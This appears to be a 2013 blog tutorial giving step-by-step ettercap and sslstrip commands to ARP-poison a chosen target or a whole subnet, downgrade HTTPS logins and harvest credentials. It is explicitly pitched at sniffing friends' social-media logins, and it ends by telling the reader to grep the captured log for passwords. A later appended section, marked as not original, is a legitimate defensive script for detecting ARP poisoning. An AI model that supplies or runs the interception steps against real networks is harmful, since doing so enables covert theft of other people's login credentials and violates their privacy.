Tuesday, April 23, 2013

Ettercap + SSLStrip

Want to sniff Facebook, Twitter or any other website's traffic on your network, or poison a friend's computer, even when the site uses HTTPS for its login page? Well, ettercap and sslstrip are ready to help.




1. Edit /etc/sysctl.conf and add this value:

net.ipv4.ip_forward=1

2. Edit /etc/etter.conf, find these values and change them to look like this:


[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

3. Redirect the traffic:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

4. Poison your target using ettercap:

ettercap -Tq -M arp:remote /192.168.56.134/ -P autoadd

"192.168.56.134" is your target's IP. You can also do it for everyone in your subnet, but bear in mind that this can make your network very slow:

ettercap -Tq -M arp:remote // //

5. Run sslstrip. You can download it from http://www.thoughtcrime.org/software/sslstrip/

sslstrip -a -l 8080 -w sslstriplog

6. Everything is set! Now just keep an eye on the sslstriplog file:

tail -f sslstriplog

7. You can grep it for specific words, such as password, pass, username, email, username_or_email, etc.  ;)


8. have fun… :)
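
Added example, not part of the original post: a defender's check for the ARP poisoning in step 4. While a host is being poisoned, its neighbour table typically shows the gateway's IP and the poisoning machine's IP resolving to the same MAC; the function below (find_shared_macs, a hypothetical name) flags that in `ip -4 neigh show` output, run here on a constructed sample table.

```shell
#!/bin/sh
# Added defensive example, not from the original post.
# Flags MAC addresses that answer for more than one IPv4 address in a
# neighbour table. A host being ARP-poisoned typically sees the gateway IP
# and the poisoning machine's IP resolve to the same MAC.

# Constructed sample in `ip -4 neigh show` format (all values made up),
# as it might look on a poisoned host in the post's 192.168.56.0/24 subnet.
SAMPLE_NEIGH='192.168.56.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.56.101 dev eth0 lladdr 08:00:27:AA:BB:CC STALE
192.168.56.120 dev eth0 lladdr 08:00:27:11:22:33 REACHABLE
192.168.56.121 dev eth0  FAILED'

# find_shared_macs (hypothetical helper name): reads neighbour entries on
# stdin and prints "<mac> <ip1>,<ip2>,..." for every MAC with 2+ IPs.
find_shared_macs() {
    awk '
        {
            mac = ""
            for (i = 1; i < NF; i++)
                if ($i == "lladdr") mac = tolower($(i + 1))
            if (mac == "") next            # FAILED/INCOMPLETE entries carry no MAC
            if (seen[mac, $1]++) next      # skip repeated rows for the same pair
            ips[mac] = (count[mac] ? ips[mac] "," : "") $1
            count[mac]++
        }
        END {
            for (mac in count)
                if (count[mac] > 1) print mac, ips[mac]
        }
    ' | sort
}

# Demo on the constructed sample. On a live Linux host:
#   ip -4 neigh show | find_shared_macs
printf '%s\n' "$SAMPLE_NEIGH" | find_shared_macs
```

A router doing proxy ARP also shows one MAC for several IPs, so treat a hit as a lead to verify against the gateway's known MAC.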
